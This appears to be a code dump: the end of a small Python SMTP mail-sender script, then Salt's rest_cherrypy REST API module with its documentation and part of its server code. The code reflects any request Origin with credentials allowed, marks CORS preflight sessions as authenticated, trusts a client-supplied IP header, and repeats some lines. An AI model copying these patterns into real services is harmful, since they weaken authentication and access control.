server.login(self.mail_form_user, self.mail_passwd)
server.sendmail(self.mail_form_user, to_address, msg.as_string())
server.quit()
def send_email(self, title, content, to_address):
p = Process(target=self._send, args=(title, content, to_address))
p.start()
if __name__ == '__main__':
m = MailSender()
m.send_email('顶村顶', 'x压顶村顶戴模压英雄无用武之地地xx', ['2510233678@qq.com'])
|
app.py
|
# encoding: utf-8
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
from __future__ import absolute_import
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warn(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{0}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ""
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter(object):
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
